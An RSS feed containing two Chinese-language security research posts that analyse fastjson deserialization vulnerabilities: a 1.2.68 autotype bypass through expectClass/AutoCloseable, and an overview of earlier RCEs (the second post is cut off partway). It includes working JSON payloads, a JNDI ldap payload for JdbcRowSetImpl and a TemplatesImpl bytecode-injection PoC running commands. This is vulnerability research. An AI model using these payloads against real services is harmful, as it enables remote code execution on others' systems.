<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>fastjson &#8211; ChaBug安全</title>
	<atom:link href="/tags/fastjson/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Thu, 18 Jun 2020 01:10:56 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>fastjson 1.2.68 bypass autotype</title>
		<link>/audit/1803.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 18 Jun 2020 01:09:36 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[fastjson]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1803</guid>

					<description><![CDATA[基于期望类的特性 分析 com.alibaba.fastjson.parser.ParserConfig#checkAutoType(String typeName, Class&#038;...]]></description>
										<content:encoded><![CDATA[<p>基于期望类的特性</p>
<h2>分析</h2>
<p><code>com.alibaba.<span class="wpcom_tag_link"><a href="/tags/fastjson" title="fastjson" target="_blank">fastjson</a></span>.parser.ParserConfig#checkAutoType(String typeName, Class&lt;?&gt; expectClass, int features)</code>方法有三个参数分别是</p>
<ol>
<li>typeName 被序列化的类名</li>
<li>expectClass 期望类</li>
<li>features值</li>
</ol>
<p>具体看下校验过程</p>
<p>首先判断非空和安全模式以及typename长度来决定是否进行autotype。</p>
<pre><code class="language-java line-numbers">        if (typeName == null) {
            return null;
        }

        if (autoTypeCheckHandlers != null) {
            for (AutoTypeCheckHandler h : autoTypeCheckHandlers) {
                Class&lt;?&gt; type = h.handler(typeName, expectClass, features);
                if (type != null) {
                    return type;
                }
            }
        }

        final int safeModeMask = Feature.SafeMode.mask;
        boolean safeMode = this.safeMode
                || (features &amp; safeModeMask) != 0
                || (JSON.DEFAULT_PARSER_FEATURE &amp; safeModeMask) != 0;
        if (safeMode) {
            throw new JSONException("safeMode not support autoType : " + typeName);
        }

        if (typeName.length() &gt;= 192 || typeName.length() &lt; 3) {
            throw new JSONException("autoType is not support. " + typeName);
        }
</code></pre>
<p>然后判断期望类</p>
<pre><code class="language-java line-numbers">        final boolean expectClassFlag;
        if (expectClass == null) {
            expectClassFlag = false;
        } else {
            if (expectClass == Object.class
                    || expectClass == Serializable.class
                    || expectClass == Cloneable.class
                    || expectClass == Closeable.class
                    || expectClass == EventListener.class
                    || expectClass == Iterable.class
                    || expectClass == Collection.class
                    ) {
                expectClassFlag = false;
            } else {
                expectClassFlag = true;
            }
        }
</code></pre>
<p>Object、Serializable、Cloneable、Closeable、EventListener、Iterable、Collection这几个类不能作为expectClass期望类。</p>
<p>然后计算hash进行内部白名单、黑名单匹配</p>
<pre><code class="language-java line-numbers">        String className = typeName.replace('$', '.');
        Class&lt;?&gt; clazz;

        final long BASIC = 0xcbf29ce484222325L;
        final long PRIME = 0x100000001b3L;

        final long h1 = (BASIC ^ className.charAt(0)) * PRIME;
        if (h1 == 0xaf64164c86024f1aL) { // [
            throw new JSONException("autoType is not support. " + typeName);
        }

        if ((h1 ^ className.charAt(className.length() - 1)) * PRIME == 0x9198507b5af98f0L) {
            throw new JSONException("autoType is not support. " + typeName);
        }

        final long h3 = (((((BASIC ^ className.charAt(0))
                * PRIME)
                ^ className.charAt(1))
                * PRIME)
                ^ className.charAt(2))
                * PRIME;

        long fullHash = TypeUtils.fnv1a_64(className);
        boolean internalWhite = Arrays.binarySearch(INTERNAL_WHITELIST_HASHCODES,  fullHash) &gt;= 0;

        if (internalDenyHashCodes != null) {
            long hash = h3;
            for (int i = 3; i &lt; className.length(); ++i) {
                hash ^= className.charAt(i);
                hash *= PRIME;
                if (Arrays.binarySearch(internalDenyHashCodes, hash) &gt;= 0) {
                    throw new JSONException("autoType is not support. " + typeName);
                }
            }
        }

        if ((!internalWhite) &amp;&amp; (autoTypeSupport || expectClassFlag)) {
            long hash = h3;
            for (int i = 3; i &lt; className.length(); ++i) {
                hash ^= className.charAt(i);
                hash *= PRIME;
                if (Arrays.binarySearch(acceptHashCodes, hash) &gt;= 0) {
                    clazz = TypeUtils.loadClass(typeName, defaultClassLoader, true);
                    if (clazz != null) {
                        return clazz;
                    }
                }
                if (Arrays.binarySearch(denyHashCodes, hash) &gt;= 0 &amp;&amp; TypeUtils.getClassFromMapping(typeName) == null) {
                    if (Arrays.binarySearch(acceptHashCodes, fullHash) &gt;= 0) {
                        continue;
                    }

                    throw new JSONException("autoType is not support. " + typeName);
                }
            }
        }
</code></pre>
<p>如果<code>(!internalWhite) &amp;&amp; (autoTypeSupport || expectClassFlag)</code>不在内部白名单中并且开启autoTypeSupport或者有期望类时，进行hash校验白名单acceptHashCodes、黑名单denyHashCodes，在白名单内就加载，在黑名单中就抛出异常。继续</p>
<pre><code class="language-java line-numbers">        clazz = TypeUtils.getClassFromMapping(typeName);

        if (clazz == null) {
            clazz = deserializers.findClass(typeName);
        }

        if (clazz == null) {
            clazz = typeMapping.get(typeName);
        }

        if (internalWhite) {
            clazz = TypeUtils.loadClass(typeName, defaultClassLoader, true);
        }

        if (clazz != null) {
            if (expectClass != null
                    &amp;&amp; clazz != java.util.HashMap.class
                    &amp;&amp; !expectClass.isAssignableFrom(clazz)) {
                throw new JSONException("type not match. " + typeName + " -&gt; " + expectClass.getName());
            }

            return clazz;
        }
</code></pre>
<p>分别从getClassFromMapping、deserializers.findClass、typeMapping、internalWhite内部白名单中查找类，如果开启了expectClass期望类还要判断类型是否一致。</p>
<p>getClassFromMapping在<code>com.alibaba.fastjson.util.TypeUtils#addBaseClassMappings</code>被赋值，添加了一些基本类，后续会当作缓存使用。<br />
<img src="https://y4er.com/img/uploads/20200616118023.png" alt="image.png" /><br />
这里先注意下<code><span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>.lang.AutoCloseable</code>类。</p>
<p>deserializers.findClass是在<code>com.alibaba.fastjson.parser.ParserConfig#initDeserializers</code>初始化。<br />
<img src="https://y4er.com/img/uploads/20200616119542.png" alt="image.png" /><br />
也是存放了一些特殊类用来直接<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>。</p>
<p>typeMapping默认为空需要开发自己赋值，形如</p>
<pre><code class="language-java line-numbers">ParserConfig.getGlobalInstance().register("test", Model.class);
</code></pre>
<p>internalWhite内部白名单就不说了，到这里已经可以返回类了，通过<code>java.net.Inet6Address</code>、<code>java.net.URL</code>等来判断fastjson也是这个原理。</p>
<p>然后继续走就到了autoTypeSupport的校验。</p>
<pre><code class="language-java line-numbers">        if (!autoTypeSupport) {
            long hash = h3;
            for (int i = 3; i &lt; className.length(); ++i) {
                char c = className.charAt(i);
                hash ^= c;
                hash *= PRIME;

                if (Arrays.binarySearch(denyHashCodes, hash) &gt;= 0) {
                    throw new JSONException("autoType is not support. " + typeName);
                }

                // white list
                if (Arrays.binarySearch(acceptHashCodes, hash) &gt;= 0) {
                    clazz = TypeUtils.loadClass(typeName, defaultClassLoader, true);

                    if (expectClass != null &amp;&amp; expectClass.isAssignableFrom(clazz)) {
                        throw new JSONException("type not match. " + typeName + " -&gt; " + expectClass.getName());
                    }

                    return clazz;
                }
            }
        }
</code></pre>
<p>黑白名单匹配。</p>
<p>继续判断使用注解JSONType的类</p>
<pre><code class="language-java line-numbers">        boolean jsonType = false;
        InputStream is = null;
        try {
            String resource = typeName.replace('.', '/') + ".class";
            if (defaultClassLoader != null) {
                is = defaultClassLoader.getResourceAsStream(resource);
            } else {
                is = ParserConfig.class.getClassLoader().getResourceAsStream(resource);
            }
            if (is != null) {
                ClassReader classReader = new ClassReader(is, true);
                TypeCollector visitor = new TypeCollector("&lt;clinit&gt;", new Class[0]);
                classReader.accept(visitor);
                jsonType = visitor.hasJsonType();
            }
        } catch (Exception e) {
            // skip
        } finally {
            IOUtils.close(is);
        }
</code></pre>
<p>继续</p>
<pre><code class="language-java line-numbers">        final int mask = Feature.SupportAutoType.mask;
        boolean autoTypeSupport = this.autoTypeSupport
                || (features &amp; mask) != 0
                || (JSON.DEFAULT_PARSER_FEATURE &amp; mask) != 0;

        if (autoTypeSupport || jsonType || expectClassFlag) {
            boolean cacheClass = autoTypeSupport || jsonType;
            clazz = TypeUtils.loadClass(typeName, defaultClassLoader, cacheClass);
        }

        if (clazz != null) {
            if (jsonType) {
                TypeUtils.addMapping(typeName, clazz);
                return clazz;
            }

            if (ClassLoader.class.isAssignableFrom(clazz) // classloader is danger
                    || javax.sql.DataSource.class.isAssignableFrom(clazz) // dataSource can load jdbc driver
                    || javax.sql.RowSet.class.isAssignableFrom(clazz) //
                    ) {
                throw new JSONException("autoType is not support. " + typeName);
            }

            if (expectClass != null) {
                if (expectClass.isAssignableFrom(clazz)) {
                    TypeUtils.addMapping(typeName, clazz);
                    return clazz;
                } else {
                    throw new JSONException("type not match. " + typeName + " -&gt; " + expectClass.getName());
                }
            }

            JavaBeanInfo beanInfo = JavaBeanInfo.build(clazz, clazz, propertyNamingStrategy);
            if (beanInfo.creatorConstructor != null &amp;&amp; autoTypeSupport) {
                throw new JSONException("autoType is not support. " + typeName);
            }
        }
</code></pre>
<p>如果有注解，则加入mapping缓存并直接返回。如果没有注解判断clazz类是否继承或实现classloader、dataSou<span class="wpcom_tag_link"><a href="/tags/rce" title="rce" target="_blank">rce</a></span>、RowSet，抛出异常防止jndi注入。</p>
<p>如果expectClass期望类不为空，则需要加载的类是期望类的子类或实现，并直接返回，否则异常。</p>
<p>如果类使用<code>JSONCreator</code>注解并且开启autoTypeSupport，抛出异常。</p>
<p>最后就是判断是否开启autoTypeSupport特性，将clazz添加进缓存，并且return clazz。</p>
<pre><code class="language-java line-numbers">        if (!autoTypeSupport) {
            throw new JSONException("autoType is not support. " + typeName);
        }

        if (clazz != null) {
            TypeUtils.addMapping(typeName, clazz);
        }
</code></pre>
<p>可以看到主要有如下种情况可以直接返回class</p>
<p>TypeUtils.mappings mappings缓存1.2.47中就被绕过了一次autotype。而这次绕过是在于<code>exceptClass</code>期望类这个功能。</p>
<p>期望类的功能主要是实现/继承了期望类的class能被反序列化出来（并且不受autotype影响），寻找checkAutoType方法的调用，要求exceptClass不为空。</p>
<p><img src="https://y4er.com/img/uploads/20200616112778.png" alt="image.png" /></p>
<p>只有两个类<code>JavaBeanDeserializer</code>、<code>ThrowableDeserializer</code>中调用了checkAutoType并且exceptClass不为空。</p>
<p>在<code>com/alibaba/fastjson/parser/ParserConfig.java:826</code>中对一些基本的类型设置了对应的反序列化实例deserializer<br />
<img src="https://y4er.com/img/uploads/20200616112730.png" alt="image.png" /><br />
ThrowableDeserializer是Throwable用来反序列化异常类的，当没有命中之前程序给定的类型时会进入createJavaBeanDeserializer()，其实就是JavaBeanDeserializer。</p>
<p>先看ThrowableDeserializer中<br />
<img src="https://y4er.com/img/uploads/20200616111164.png" alt="image.png" /></p>
<p>根据第二个<code>@type</code>获取类，并且传入指定期望类进行加载。因此可以反序列化继承Throwable的异常类，借助setter、getter等方法的自动调用，来挖掘gadget。浅蓝师傅给了一个gadget</p>
<pre><code class="language-java line-numbers">package org.chabug.fastjson.exploit;

import java.io.IOException;

public class ExecException extends Exception {

    private String domain;

    public ExecException() {
        super();
    }

    public String getDomain() {
        return domain;
    }

    public void setDomain(String domain) {
        this.domain = domain;
    }

    @Override
    public String getMessage() {
        try {
            Runtime.getRuntime().exec(new String[]{"cmd", "/c", "ping " + domain});
        } catch (IOException e) {
            return e.getMessage();
        }

        return super.getMessage();
    }
}
</code></pre>
<p>提交json触发rce</p>
<pre><code class="language-java line-numbers">{
  "@type":"java.lang.Exception",
  "@type": "org.chabug.fastjson.exploit.ExecException",
  "domain": "y4er.com | calc"
}
</code></pre>
<p>当然很少有开发者把命令执行写道异常类处理中，所以Throwable鸡肋。</p>
<p>再来看JavaBeanDeserializer，在fastjson中对大部分类都指定了特定的deserializer，而AutoCloseable类没有，通过继承/实现AutoCloseable的类可以绕过autotype反序列化。场景如下：</p>
<pre><code class="language-java line-numbers">package org.chabug.fastjson.exploit;

import java.io.Closeable;
import java.io.IOException;

public class ExecCloseable implements Closeable {
    private String domain;

    public ExecCloseable() {
    }

    public ExecCloseable(String domain) {
        this.domain = domain;
    }

    public String getDomain() {
        try {
            Runtime.getRuntime().exec(new String[]{"cmd", "/c", "ping " + domain});
        } catch (IOException e) {
            e.printStackTrace();
        }
        return domain;
    }

    public void setDomain(String domain) {
        this.domain = domain;
    }

    @Override
    public void close() throws IOException {

    }
}
</code></pre>
<p>提交json触发rce</p>
<pre><code class="language-java line-numbers">{
  "@type":"java.lang.AutoCloseable",
  "@type": "org.chabug.fastjson.exploit.ExecCloseable",
  "domain": "y4er.com | calc"
}
</code></pre>
<p>fastjson在黑名单中还加上了java.lang.Runnable、java.lang.Readable，这个利用场景拿Runnable举个例子</p>
<pre><code class="language-java line-numbers">package org.chabug.fastjson.exploit;

import java.io.IOException;

public class ExecRunnable implements AutoCloseable {
    private EvalRunnable eval;

    public EvalRunnable getEval() {
        return eval;
    }

    public void setEval(EvalRunnable eval) {
        this.eval = eval;
    }

    @Override
    public void close() throws Exception {

    }
}

class EvalRunnable implements Runnable {
    private String cmd;

    public String getCmd() {
        System.out.println("EvalRunnable getCmd() "+cmd);
        try {
            Runtime.getRuntime().exec(new String[]{"cmd","/c",cmd});
        } catch (IOException e) {
            e.printStackTrace();
        }
        return cmd;
    }

    public void setCmd(String cmd) {
        this.cmd = cmd;
    }

    @Override
    public void run() {

    }
}
</code></pre>
<pre><code class="language-java line-numbers">{
  "@type":"java.lang.AutoCloseable",
  "@type": "org.chabug.fastjson.exploit.ExecRunnable",
  "eval":{"@type":"org.chabug.fastjson.exploit.EvalRunnable","cmd":"calc"}
}
</code></pre>
<p>Readable同理。</p>
<p>拓展使用$ref拓展攻击面，使用parse()解析的也能触发任意getter。这个payload来自 <a class="wp-editor-md-post-content-link" href="https://github.com/threedr3am/learnjavabug/commit/ea61297cf7b2125ecae0064d2b8061a9e32db1e6">@threedr3am</a></p>
<pre><code class="language-java line-numbers">package org.chabug.fastjson.exploit;

import com.alibaba.fastjson.JSON;
import org.apache.shiro.jndi.JndiLocator;
import org.apache.shiro.util.Factory;

import javax.naming.NamingException;

public class RefAnyGetterInvoke&lt;T&gt; extends JndiLocator implements Factory&lt;T&gt;, AutoCloseable {
    private String resourceName;

    public RefAnyGetterInvoke() {
    }

    public static void main(String[] args) {
        String json = "{\n" +
                "  \"@type\":\"java.lang.AutoCloseable\",\n" +
                "  \"@type\": \"org.chabug.fastjson.exploit.RefAnyGetterInvoke\",\n" +
                "  \"resourceName\": \"ldap://localhost:1389/Calc\",\n" +
                "  \"instance\": {\n" +
                "    \"$ref\": \"$.instance\"\n" +
                "  }\n" +
                "}";
        System.out.println(json);
        JSON.parse(json);   // 默认不会调用getter 使用$ref就可以调用到getInstance()
//        JSON.parseObject(json); // parseObject默认就会调用getter getInstance()
    }

    public T getInstance() {
        System.out.println(getClass().getName() + ".getInstance() invoke.");
        try {
            return (T) this.lookup(this.resourceName);
        } catch (NamingException var3) {
            throw new IllegalStateException("Unable to look up with jndi name '" + this.resourceName + "'.", var3);
        }
    }

    public String getResourceName() {
        System.out.println(getClass().getName() + ".getResourceName() invoke.");
        return this.resourceName;
    }

    public void setResourceName(String resourceName) {
        System.out.println(getClass().getName() + ".setResourceName() invoke.");
        this.resourceName = resourceName;
    }

    @Override
    public void close() throws Exception {

    }
}
</code></pre>
<h2>gadget</h2>
<pre><code class="language-java line-numbers"> if (ClassLoader.class.isAssignableFrom(clazz) // classloader is danger
                    || javax.sql.DataSource.class.isAssignableFrom(clazz) // dataSource can load jdbc driver
                    || javax.sql.RowSet.class.isAssignableFrom(clazz) //
                    ) {
                throw new JSONException("autoType is not support. " + typeName);
            }
</code></pre>
<p>因为这几行代码的限制，大部分的JNDI gadget都不能用了，需要找到一条基于AutoCloseable的新gadget。浅蓝师傅给的思路是挖掘文件读写操作。我还在挖掘中，欢迎各位师傅交流。</p>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Fastjson 反序列化RCE分析</title>
		<link>/audit/1525.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 26 Apr 2020 04:40:45 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[fastjson]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1525</guid>

					<description><![CDATA[前言 fastjson是阿里巴巴的一个json库，频频爆RCE。本文分析fastjson至今的一些RCE漏洞。 fastjson的使用 引入库 &#60;dependency&#62;...]]></description>
										<content:encoded><![CDATA[<h2>前言</h2>
<p><span class="wpcom_tag_link"><a href="/tags/fastjson" title="fastjson" target="_blank">fastjson</a></span>是阿里巴巴的一个json库，频频爆RCE。本文分析fastjson至今的一些RCE漏洞。</p>
<h2>fastjson的使用</h2>
<p>引入库</p>
<pre data-language=XML><code class="language-markup ">&lt;dependency&gt;
    &lt;groupId&gt;com.alibaba&lt;/groupId&gt;
    &lt;artifactId&gt;fastjson&lt;/artifactId&gt;
    &lt;version&gt;1.2.24&lt;/version&gt;
&lt;/dependency&gt;
</code></pre>
<p>创建一个实体类User</p>
<pre><code class="language-java ">package org.chabug.fastjson.model;

public class User {
    private int id;
    private int age;
    private String name;

    @Override
    public String toString() {
        return "User{" +
            "id=" + id +
            ", age=" + age +
            ", name='" + name + ''' +
            '}';
    }

    public int getId() {
        return id;
    }

    public void setId(int id) {
        this.id = id;
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }
}
</code></pre>
<p>使用fastjson解析为字符串、从字符串解析为对象：</p>
<pre><code class="language-java ">package org.chabug.fastjson.run;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.serializer.SerializerFeature;
import org.chabug.fastjson.model.User;

import java.util.HashMap;
import java.util.Map;

public class JSONTest {
    public static void main(String[] args) {
        Map&lt;String, Object&gt; map = new HashMap&lt;String, Object&gt;();
        map.put("key1", "One");
        map.put("key2", "Two");
        String mapJson = JSON.toJSONString(map);
        System.out.println(mapJson);

        System.out.println("--------------------------");


        User user = new User();
        user.setId(1);
        user.setAge(17);
        user.setName("张三");

        // 对象转字符串
        String s1 = JSON.toJSONString(user);
        String s2 = JSON.toJSONString(user, SerializerFeature.WriteClassName);
        System.out.println(s1);
        System.out.println(s2);

        System.out.println("--------------------------");

        // 字符串转对象
        User o1 = (User) JSON.parse(s2);
        System.out.println("o1:"+o1);
        System.out.println(o1.getClass().getName());

        JSONObject o2 = JSON.parseObject(s2);
        System.out.println("o2:"+o2);
        System.out.println(o2.getClass().getName());

        Object o3 = JSON.parseObject(s2, Object.class);
        System.out.println("o3:"+o3);
        System.out.println(o3.getClass().getName());

    }
}
</code></pre>
<p>运行结果</p>
<pre><code class="language-text ">{"key1":"One","key2":"Two"}
--------------------------
{"age":17,"id":1,"name":"张三"}
{"@type":"org.chabug.fastjson.model.User","age":17,"id":1,"name":"张三"}
--------------------------
o1:User{id=1, age=17, name='张三'}
org.chabug.fastjson.model.User
o2:{"name":"张三","id":1,"age":17}
com.alibaba.fastjson.JSONObject
o3:User{id=1, age=17, name='张三'}
org.chabug.fastjson.model.User
</code></pre>
<p>fastjson通过<code>JSON.toJSONString()</code>将对象转为字符串(序列化)，当使用<code>SerializerFeature.WriteClassName</code>参数时会将对象的类名写入<code>@type</code>字段中，在重新转回对象时会根据<code>@type</code>来指定类，进而调用该类的<code>set</code>、<code>get</code>方法。因为这个特性，我们可以指定<code>@type</code>为任意存在问题的类，造成一些问题。</p>
<p>在字符串转对象的过程中(<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>)，主要使用<code>JSON.parse()</code>和<code>JSON.parseObject()</code>两个方法，两者区别在于<code>parse()</code>会返回实际类型(User)的对象，而<code>parseObject()</code>在不指定class时返回的是<code>JSONObject</code>，指定class才会返回实际类型(User)的对象，也就是<code>JSON.parseObject(s2)</code>和<code>JSON.parseObject(s2, Object.class)</code>的区别，这里也可以指定为<code>User.class</code>。</p>
<p>我们再来看<code>@type</code>的问题，我定义了一个Evil类，在其set方法中可以执行命令</p>
<pre><code class="language-java ">package org.chabug.fastjson.model;

import java.io.IOException;

public class Evil {
    private String cmd;

    public String getCmd() {
        System.out.println("getCmd()");
        return cmd;
    }

    public void setCmd(String cmd) {
        System.out.println("setCmd()");
        this.cmd = cmd;
        try {
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public Evil() {
        System.out.println("Evil()");
    }
}
</code></pre>
<p>用springboot起了一个web<br />
<img src="https://y4er.com/img/uploads/20200426110221.png" alt="image.png" /></p>
<p>成功弹出了计算器<br />
<img src="/wp-content/uploads/2020/04/20200426112943.png" alt="image.png" /></p>
<p>我们通过控制<code>@type</code>来实现反序列化恶意Evil类，从而RCE，很简单只是举个例子说明<code>@type</code>的使用。</p>
<p>那么到这里还有一个问题，为什么写在<code>setCmd</code>方法会自动调用呢？</p>
<h2>setter、getter、is自动调用</h2>
<p>对应的Evil<br />
<img src="/wp-content/uploads/2020/04/20200426112989.png" alt="image.png" /></p>
<p>写一个test测试下<br />
<img src="/wp-content/uploads/2020/04/20200426117757.png" alt="image.png" /></p>
<p>可以看到<code>parseObject(evil)</code>的get、set、构造方法都自动调用了，另外两种解析方式只调用了set、构造方法。</p>
<p>在前文中我们知道<code>parseObject(evil)</code>返回的是<code>JSONObject</code>对象，跟进其方法发现也是使用parse解析的，但是多了一个<code>(JSONObject)toJSON(obj)</code><br />
<img src="/wp-content/uploads/2020/04/20200426110951.png" alt="image.png" /><br />
这个方法调用的get，堆栈如下</p>
<pre><code class="language-text ">getCmd:11, Evil (org.chabug.fastjson.model)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
get:451, FieldInfo (com.alibaba.fastjson.util)
getPropertyValue:105, FieldSerializer (com.alibaba.fastjson.serializer)
getFieldValuesMap:439, JavaBeanSerializer (com.alibaba.fastjson.serializer)
toJSON:902, JSON (com.alibaba.fastjson)
toJSON:824, JSON (com.alibaba.fastjson)
parseObject:206, JSON (com.alibaba.fastjson)
main:13, Test (org.chabug.fastjson.run)
</code></pre>
<p>比较简单，不详细分析，大致就是通过反射调用getter方法获取字段的值存入hashmap。那么setter在哪调用的？</p>
<p>在<code>com.alibaba.fastjson.util.JavaBeanInfo#build</code>中</p>
<p><img src="/wp-content/uploads/2020/04/20200426115009.png" alt="image.png" /></p>
<p>在通过<code>@type</code>拿到类之后，通过反射拿到该类所有的方法存入methods，接下来遍历methods进而获取get、set方法，如上图。总结set方法自动调用的条件为：<br />
1. 方法名长度大于4<br />
2. 非静态方法<br />
3. 返回值为void或当前类<br />
4. 方法名以set开头<br />
5. 参数个数为1</p>
<p>当满足条件之后会从方法名截取属性名，截取时会判断<code>_</code>，如果是<code>set_name</code>会截取为<code>name</code>属性，具体逻辑如下：<br />
<img src="/wp-content/uploads/2020/04/20200426118528.png" alt="image.png" /></p>
<p>当截取完但是找不到这个属性<br />
<img src="/wp-content/uploads/2020/04/20200426113707.png" alt="image.png" /></p>
<p>会判断传入的第一个参数类型是否为布尔型，是的话就在截取完的变量前加上<code>is</code>，截取propertyName的第一个字符转大写和第二个字符，并且然后重新尝试获取属性字段。</p>
<p>比如：public boolean setBoy(boolean t) 会寻找<code>isBoy</code>字段。</p>
<p>set的整个判断就是：如果有setCmd()会绑定cmd属性，如果该类没有cmd属性会绑定isCmd属性。</p>
<p>get的判断<br />
<img src="/wp-content/uploads/2020/04/20200426119593.png" alt="image.png" /><br />
总结下就是：<br />
1. 方法名长度大于等于4<br />
2. 非静态方法<br />
3. 以get开头且第4个字母为大写<br />
4. 无传入参数<br />
5. 返回值类型继承自Collection Map AtomicBoolean AtomicInteger AtomicLong</p>
<p>当程序绑定了对应的字段之后，如果传入json字符串的键值中存在这个值，就会去调用执行对应的setter、构造方法。</p>
<p>小结：<br />
1. parse(jsonStr) 构造方法+Json字符串指定属性的setter()+特殊的getter()<br />
2. parseObject(jsonStr) 构造方法+Json字符串指定属性的setter()+所有getter() 包括不存在属性和私有属性的getter()<br />
3. parseObject(jsonStr,Object.class) 构造方法+Json字符串指定属性的setter()+特殊的getter()</p>
<h2>fastjson漏洞历程</h2>
<p>fastjson漏洞经历了多次绕过及修复，甚至出现了加密黑名单防止安全研究= =</p>
<h3>1.2.22-1.2.24</h3>
<p>在小于fastjson1.2.22-1.2.24版本中有两条利用链。<br />
1. JNDI <code>com.sun.rowset.JdbcRowSetImpl</code><br />
2. JDK7u21 <code>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</code></p>
<h4>JNDI利用链</h4>
<p>JNDI传输过程中使用的就是序列化和反序列化，所以通杀三种解析方式</p>
<pre><code class="language-java ">JSON.parse(evil);
JSON.parseObject(evil);
JSON.parseObject(evil, Object.class);
</code></pre>
<p>原理就是setter的自动调用</p>
<pre><code class="language-java ">package org.chabug.fastjson.run;

import com.sun.rowset.JdbcRowSetImpl;

import java.sql.SQLException;

public class Test {
    public static void main(String[] args) {


        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        try {
            jdbcRowSet.setDataSourceName("ldap://localhost:1389/#Calc");
            jdbcRowSet.setAutoCommit(true);
        } catch (SQLException e) {
            e.printStackTrace();
        }
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/04/20200426110423.png" alt="image.png" /></p>
<p>setDataSou<span class="wpcom_tag_link"><a href="/tags/rce" title="rce" target="_blank">rce</a></span>Name()和setAutoCommit()满足setter自动调用的条件，当我们传入对应json键值对时就会触发setter，进而触发jndi链接。payload如下</p>
<pre><code class="language-json ">{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://localhost:1389/#Calc", "autoCommit":true}
</code></pre>
<h4>TemplatesImpl利用链</h4>
<p>条件苛刻<br />
1. 服务端使用parseObject()时，必须使用如下格式才能触发漏洞：<code>JSON.parseObject(input, Object.class, Feature.SupportNonPublicField)</code><br />
2. 服务端使用parse()时，需要<code>JSON.parse(text1,Feature.SupportNonPublicField)</code></p>
<p>poc</p>
<pre><code class="language-java ">package org.chabug.fastjson.run;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.tomcat.util.codec.binary.Base64;

public class JDK7u21 {
    // 参考https://y4er.com/post/ysoserial-commonscollections-2/
    public static byte[] getevilbyte() throws Exception {
        ClassPool pool = ClassPool.getDefault();
        CtClass cc = pool.get(test.class.getName());
        String cmd = "java.lang.Runtime.getRuntime().exec("calc");";
        cc.makeClassInitializer().insertBefore(cmd);
        String randomClassName = "Y4er" + System.nanoTime();
        cc.setName(randomClassName);
        cc.setSuperclass((pool.get(AbstractTranslet.class.getName())));

        return cc.toBytecode();
    }


    //main函数调用以下poc而已
    public static void main(String args[]) {
        try {
            byte[] evilCode = getevilbyte();
            String evilCode_base64 = Base64.encodeBase64String(evilCode);
            final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
            String text1 = "{"@type":"" + NASTY_CLASS + "","_bytecodes":["" + evilCode_base64 + ""],'_name':'asd','_tfactory':{ },"_outputProperties":{ }," + ""_version":"1.0","allowedProtocols":"all"}n";
            System.out.println(text1);
            ParserConfig config = new ParserConfig();
            Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static class test {

    }
}
</code></pre>
<p>看完poc应该考虑的几个问题：<br />
1. 为什么<code>parseObject</code>需要<code>Feature.SupportNonPublicField</code>？<br />
2. 为什么需要<code>_outputProperties</code>属性？<br />
3. <code>_bytecodes</code>为什么需要base64编码？<br />
4. <code>_tfactory</code>为什么为{}？</p>
<p><strong>问题1：<code>Feature.SupportNonPublicField</code></strong><br />
在fastjson中默认并不能序列化private属性，而我们使用的<code>TemplatesImpl</code>利用链的多个属性都是private，所以在反序列化的时候需要加上<code>Feature.SupportNonPublicField</code>，这也成了这个利用链的最大限制。<br />
<img src="/wp-content/uploads/2020/04/20200426119442.png" alt="image.png" /></p>
<p><strong>问题2：为什么需要<code>_outputProperties</code>属性</strong><br />
答案是为了触发<code>getOutputProperties()</code>。再问：如果getOutputProperties()是_outputProperties属性的getter方法那不符合规则啊！下面就来分析下：</p>
